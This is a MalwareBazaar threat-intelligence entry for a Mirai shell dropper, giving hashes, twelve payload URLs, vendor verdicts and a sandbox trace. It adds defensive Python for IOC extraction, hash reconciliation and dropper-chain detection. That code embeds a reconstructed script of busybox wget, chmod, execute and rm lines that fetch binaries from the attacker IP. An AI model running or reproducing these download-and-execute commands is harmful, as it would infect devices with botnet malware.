MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 7

SHA256 hash: b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6
SHA3-384 hash: c2a85c21fbf0fdcb59879562b242e0af634c74aa65cf8d8fede78e8b6e999b478846099d04512347c35b74b528458604
SHA1 hash: c7add8b7521b00b4efc587914cc39e922579558b
MD5 hash: 6b7bcc091d03df7585ceae5a7677e899
humanhash: seven-aspen-mountain-uncle
File name: w.sh
Signature: Mirai
File size: 802 bytes
First seen: 2025-06-25 19:10:29 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 6:0eEceQ48e0NIl5XeEa0LKiherODOPevIpe6Px8eAf0SXeehFL5i0eScewhanIgem:344NIl5K0LK8DOdlpS1t04Djv
TLSH: T1670121CD605556610468DD00B367CE2A5405AEC122800FAD694E0DF26DDFF307F67F8E
Magika: txt
Reporter: abuse_ch
Tags: sh
Payloads fetched by this script (each row is a URL, the SHA256 of the sample served at it, its signature and tags; the extracted page had run the URL and hash together, and they are split here on the 64-hex-character hash):

URL | Malware sample (SHA256 hash) | Signature | Tags
http://103.69.96.221/arm | a39d12ac29f27497f06651e771b7b6e0b4add4f6e69980677e47c50509374139 | Mirai | elf mirai ua-wget
http://103.69.96.221/arm5 | 81cec79087ebb457756d9cfb5ffa8a822c6644f0e4aa04006d36bd7d16bae8ee | Mirai | elf mirai ua-wget
http://103.69.96.221/arm6 | 2d8e58cb12af842552eb436da561952d27cb1a88681e3b0ceb7b1550c75de064 | Mirai | elf mirai ua-wget
http://103.69.96.221/arm7 | 00eabaddd45ec2a5561dceba20946b21a4cb10e83265c18c7c817ea2cfeb3522 | Mirai | elf mirai ua-wget
http://103.69.96.221/m68k | 804fa47f76786f0859d114609116ea76016af1c31180af810790902f99a4e79f | Mirai | elf mirai ua-wget
http://103.69.96.221/mips | 856d04f62b520a17ebfb2d178600f7dbed8184cc361043ef2877365d1848b957 | Mirai | elf mirai ua-wget
http://103.69.96.221/mpsl | 0df808e3fa32fe14334d6057de74b8dcc98a3947e8207d75faa2f7be67b06a0e | Mirai | elf mirai ua-wget
http://103.69.96.221/ppc | 51f125abc6b45027dd851115caf240cd3bc6ed1a72bcbc66cfd19bdc640b2f89 | Mirai | elf mirai ua-wget
http://103.69.96.221/sh4 | 2b69d8c7fd511e88c99ebaa889cf6f7fe4bf00beb8b6106e2b6ea73132128753 | Mirai | elf mirai ua-wget
http://103.69.96.221/spc | 88c36968a455f9d060c299a047e40b4f8185e2f7808e1eb56e8d55e7c30407c8 | Mirai | elf mirai ua-wget
http://103.69.96.221/x86 | de0567748097a8ba22759d2876355dfc2a46d4969b00047587a22f2c67ec0065 | Mirai | elf mirai ua-wget
http://103.69.96.221/x86_64 | 872d88be5ab68bd69614c99918a20bc165c3e55b1bbcfd4f75f2cf4bddf1b13c | Mirai | elf mirai ua-wget
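Triage of a dropper like this one normally starts by pulling the download URLs out of the script and checking which of the fetched payloads are already documented. The following is an added example, not code from MalwareBazaar or from whoever wrote the sample: it extracts URL, local file name and the chmod/exec/rm steps from each line, reconciles the result against the hash table above, defangs the IOCs for reporting, and looks a downloaded file up by SHA256. The script text it runs on is constructed to match the busybox wget, chmod, execute, rm chain recorded in the sandbox graph further down the page (the page does not reproduce w.sh itself); the regexes and helper names are assumptions, while the URL paths and SHA256 values are copied from the table.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed stand-in for a w.sh-style downloader (NOT the contents of the sample
# on this page). One unrolled line per payload, matching the sandbox's
# busybox wget -> chmod -> exec -> rm chain and the twelve documented URLs.
SAMPLE_SCRIPT = """#!/bin/sh
busybox wget http://103.69.96.221/arm -O arm; chmod +x arm; ./arm; rm -f arm
busybox wget http://103.69.96.221/arm5 -O arm5; chmod +x arm5; ./arm5; rm -f arm5
busybox wget http://103.69.96.221/arm6 -O arm6; chmod +x arm6; ./arm6; rm -f arm6
busybox wget http://103.69.96.221/arm7 -O arm7; chmod +x arm7; ./arm7; rm -f arm7
busybox wget http://103.69.96.221/m68k -O m68k; chmod +x m68k; ./m68k; rm -f m68k
busybox wget http://103.69.96.221/mips -O mips; chmod +x mips; ./mips; rm -f mips
busybox wget http://103.69.96.221/mpsl -O mpsl; chmod +x mpsl; ./mpsl; rm -f mpsl
busybox wget http://103.69.96.221/ppc -O ppc; chmod +x ppc; ./ppc; rm -f ppc
busybox wget http://103.69.96.221/sh4 -O sh4; chmod +x sh4; ./sh4; rm -f sh4
busybox wget http://103.69.96.221/spc -O spc; chmod +x spc; ./spc; rm -f spc
busybox wget http://103.69.96.221/x86 -O x86; chmod +x x86; ./x86; rm -f x86
busybox wget http://103.69.96.221/x86_64 -O x86_64; chmod +x x86_64; ./x86_64; rm -f x86_64
"""

# Payload SHA256 values exactly as listed in the URL table above, keyed by URL path.
KNOWN_PAYLOADS = {
    "arm":    "a39d12ac29f27497f06651e771b7b6e0b4add4f6e69980677e47c50509374139",
    "arm5":   "81cec79087ebb457756d9cfb5ffa8a822c6644f0e4aa04006d36bd7d16bae8ee",
    "arm6":   "2d8e58cb12af842552eb436da561952d27cb1a88681e3b0ceb7b1550c75de064",
    "arm7":   "00eabaddd45ec2a5561dceba20946b21a4cb10e83265c18c7c817ea2cfeb3522",
    "m68k":   "804fa47f76786f0859d114609116ea76016af1c31180af810790902f99a4e79f",
    "mips":   "856d04f62b520a17ebfb2d178600f7dbed8184cc361043ef2877365d1848b957",
    "mpsl":   "0df808e3fa32fe14334d6057de74b8dcc98a3947e8207d75faa2f7be67b06a0e",
    "ppc":    "51f125abc6b45027dd851115caf240cd3bc6ed1a72bcbc66cfd19bdc640b2f89",
    "sh4":    "2b69d8c7fd511e88c99ebaa889cf6f7fe4bf00beb8b6106e2b6ea73132128753",
    "spc":    "88c36968a455f9d060c299a047e40b4f8185e2f7808e1eb56e8d55e7c30407c8",
    "x86":    "de0567748097a8ba22759d2876355dfc2a46d4969b00047587a22f2c67ec0065",
    "x86_64": "872d88be5ab68bd69614c99918a20bc165c3e55b1bbcfd4f75f2cf4bddf1b13c",
}

URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;'\"|&<>]+")
TOOL_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def extract_downloads(script):
    """One record per fetched file: url, local name, and which of the
    download/chmod/exec/rm steps appear on the same line of the script."""
    found = []
    for line in script.splitlines():
        tool = TOOL_RE.search(line)
        for url in URL_RE.findall(line):
            name = urlparse(url).path.rsplit("/", 1)[-1]
            n = re.escape(name)
            stages = [tool.group(1) if tool else "url"]
            if re.search(rf"\bchmod\s+\S+\s+{n}\b", line):
                stages.append("chmod")
            if re.search(rf"(?:^|[;&|\s])\./{n}\b", line):
                stages.append("exec")
            if re.search(rf"\brm\s+(?:-\S+\s+)*{n}\b", line):
                stages.append("rm")
            found.append({"url": url, "name": name, "stages": tuple(stages)})
    return found


def reconcile(downloads, known=KNOWN_PAYLOADS):
    """Compare the paths the script fetches with the documented payload set."""
    bad = [p for p, h in known.items() if not SHA256_RE.match(h)]
    if bad:
        raise ValueError(f"malformed SHA256 for: {bad}")
    seen = {d["name"] for d in downloads}
    return {
        "matched": sorted(seen & known.keys()),
        "unknown": sorted(seen - known.keys()),   # new payloads worth submitting
        "missing": sorted(known.keys() - seen),   # documented but not in this script
    }


def defang(url):
    """Rewrite scheme and host so the IOC cannot be clicked in a report."""
    p = urlparse(url)
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}{query}"


def identify_payload(data, known=KNOWN_PAYLOADS):
    """Return the URL path whose documented SHA256 matches these bytes, else None."""
    digest = hashlib.sha256(data).hexdigest()
    return next((p for p, h in known.items() if h == digest), None)


if __name__ == "__main__":
    downloads = extract_downloads(SAMPLE_SCRIPT)
    for d in downloads:
        print(f"{defang(d['url']):40} {' > '.join(d['stages'])}")
    print(reconcile(downloads))
```

The reconcile step is the useful check when a new w.sh variant turns up: a path in "unknown" is a payload MalwareBazaar has no hash for yet, and a path in "missing" is one the actor dropped from the rotation. Hash matching only works on the exact bytes served at collection time; a re-built payload at the same URL will not match and needs its own submission.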

Intelligence


File Origin
# of uploads: 1
# of downloads: 100
Origin country: DE
Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: lolbin remote
Status: terminated
Behavior Graph (summarised from the sandbox's process and network graph; pids as recorded):
- /usr/bin/sudo (pid 3564) execve → /tmp/sample.bin (pid 3569), the script under analysis.
- /tmp/sample.bin repeats one loop twelve times, once per payload: execve /usr/bin/busybox (net, send-data, write-file) → execve /usr/bin/chmod. In the first ten iterations the loop ends in a clone of /usr/bin/dash (pids 4522, 4817, 5230, 5241, 5277, 5281, 5285, 5289, 5293, 5297) with no further activity shown; in the last two it ends in execve of a fetched binary.
- Each busybox child (pids 3571, 4528, 4822, 5232, 5243, 5279, 5283, 5287, 5291, 5295, 5299, 5303) sends a single 79 to 82 byte request to 103.69.96.221:80. The sizes track the path lengths in the URL table above in table order (79 B for /arm, 80 B for /arm5, 82 B for /x86_64), consistent with one minimal HTTP GET per file.
- Only /home/sandbox/x86 (pid 5301) and /home/sandbox/x86_64 (pid 5307) are shown executing. Each connects to 46.3.112.9:53, then clones a child (pids 5302 and 5308, tagged dns, net, send-data, zombie) that sends 760 B and 570 B respectively to 8.8.8.8:53, connects to 0.0.0.0:0 and forks further children (5304 → 5305 and 5310 → 5311).
- /tmp/sample.bin finally execve /usr/bin/rm (pid 5309, delete-file).
Threat name: Script-Shell.Worm.Mirai
Status: Malicious
First seen: 2025-06-25 18:10:28 UTC
File Type: Text (Shell)
AV detection: 18 of 38 (47.37%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Enumerates physical storage devices
These three indicators are Windows API behaviours. An 802-byte POSIX shell script cannot produce them, so this result reflects how that sandbox handled a text file rather than anything the sample did, which is consistent with its low 3/10 score. For this entry, the Linux execution trace above and the URL table are the evidence to rely on.
Please note that we are no longer able to provide a coverage score for Virus Total.
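The Linux trace in the vendor section above is the generic IoT dropper pattern: a shell fetches a file with busybox wget, marks it executable, runs it and deletes it, once per architecture. On a host you control, that sequence under a single parent process is detectable from process-creation events alone. The following is an added example, not code from MalwareBazaar or from any of the vendors above: a small stateful detector that tracks download → chmod → exec → rm per (parent pid, file name) and alerts at the exec step. The JSON-lines event format and the events themselves are constructed for the example (they are not an export of the sandbox), and the field names are assumptions; the point it makes is that busybox applets must be identified from argv, not from the executable path, which is what the lolbin tag above records.

```python
import json
import os

# Constructed process-event log in a minimal JSON-lines shape (an assumption; not
# an export from the sandbox whose graph is shown above). ppid 100 is a shell
# running a dropper; ppids 200 and 300 are benign activity that must not alert.
EVENTS = """\
{"ts": 1, "pid": 101, "ppid": 100, "exe": "/usr/bin/busybox", "argv": ["busybox", "wget", "http://103.69.96.221/arm", "-O", "arm"]}
{"ts": 2, "pid": 102, "ppid": 100, "exe": "/usr/bin/chmod", "argv": ["chmod", "+x", "arm"]}
{"ts": 3, "pid": 103, "ppid": 100, "exe": "/tmp/arm", "argv": ["./arm"]}
{"ts": 4, "pid": 104, "ppid": 100, "exe": "/usr/bin/rm", "argv": ["rm", "-f", "arm"]}
{"ts": 5, "pid": 201, "ppid": 200, "exe": "/usr/bin/wget", "argv": ["wget", "https://mirror.example/pkg.tar.gz"]}
{"ts": 6, "pid": 301, "ppid": 300, "exe": "/usr/bin/chmod", "argv": ["chmod", "755", "build.sh"]}
{"ts": 7, "pid": 302, "ppid": 300, "exe": "/bin/sh", "argv": ["./build.sh"]}
{"ts": 8, "pid": 105, "ppid": 100, "exe": "/usr/bin/busybox", "argv": ["busybox", "wget", "http://103.69.96.221/x86_64", "-O", "x86_64"]}
{"ts": 9, "pid": 106, "ppid": 100, "exe": "/usr/bin/chmod", "argv": ["chmod", "777", "x86_64"]}
{"ts": 10, "pid": 107, "ppid": 100, "exe": "/tmp/x86_64", "argv": ["./x86_64"]}
"""

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}


def applet_name(ev):
    """Tool actually run. 'busybox wget' shows up as exe=/usr/bin/busybox, so the
    applet has to be read from argv[1]; keying on exe alone misses it."""
    argv = ev.get("argv") or [ev["exe"]]
    name = os.path.basename(argv[0])
    if name == "busybox" and len(argv) > 1:
        name = argv[1]
    return name


def download_target(argv):
    """(url, local file name) for a wget/curl style command line."""
    url = next((a for a in argv if a.startswith(("http://", "https://", "ftp://", "tftp://"))), None)
    name = None
    for i in range(len(argv) - 1):
        if argv[i] in ("-O", "-o") and not argv[i + 1].startswith("-"):
            name = os.path.basename(argv[i + 1])
    if name is None and url:
        name = os.path.basename(url.rstrip("/"))
    return url, name


def last_operand(argv):
    """Last non-option argument, e.g. the file in 'chmod +x arm' or 'rm -f arm'."""
    ops = [a for a in argv[1:] if not a.startswith(("-", "+")) and not a.isdigit()]
    return os.path.basename(ops[-1]) if ops else None


def detect_dropper_chains(lines):
    """Return one alert per file that was downloaded, chmod'ed and executed under
    the same parent; an 'rm' of that file afterwards is appended to its stages."""
    state = {}    # (ppid, file name) -> chain record
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        tool, ppid = applet_name(ev), ev["ppid"]
        if tool in DOWNLOADERS:
            url, name = download_target(ev["argv"])
            if name:
                state[(ppid, name)] = {"ppid": ppid, "file": name, "url": url,
                                       "stages": [tool], "first_ts": ev["ts"]}
        elif tool == "chmod":
            rec = state.get((ppid, last_operand(ev["argv"])))
            if rec and rec["stages"][-1] in DOWNLOADERS:
                rec["stages"].append("chmod")
        elif tool == "rm":
            rec = state.get((ppid, last_operand(ev["argv"])))
            if rec and "exec" in rec["stages"]:
                rec["stages"].append("rm")
        else:
            # Any other execve: is it the file this parent just fetched and chmod'ed?
            # Check both the executable path and argv, so 'sh ./arm' is caught too.
            names = {os.path.basename(ev["exe"])} | {os.path.basename(a) for a in ev.get("argv", [])}
            for name in names:
                rec = state.get((ppid, name))
                if rec and "chmod" in rec["stages"] and "exec" not in rec["stages"]:
                    rec["stages"].append("exec")
                    alerts.append(rec)
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect_dropper_chains(EVENTS.splitlines()):
        print(json.dumps(alert))
```

Keying on the parent pid is what keeps the benign cases quiet: the wget under ppid 200 is never made executable, and the build script under ppid 300 was never downloaded. The same logic ports directly to auditd EXECVE records or an EDR's process-start telemetry; the only host-specific part is the field mapping at the top.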

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Mirai
Sample: sh b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6 (this sample)

Comments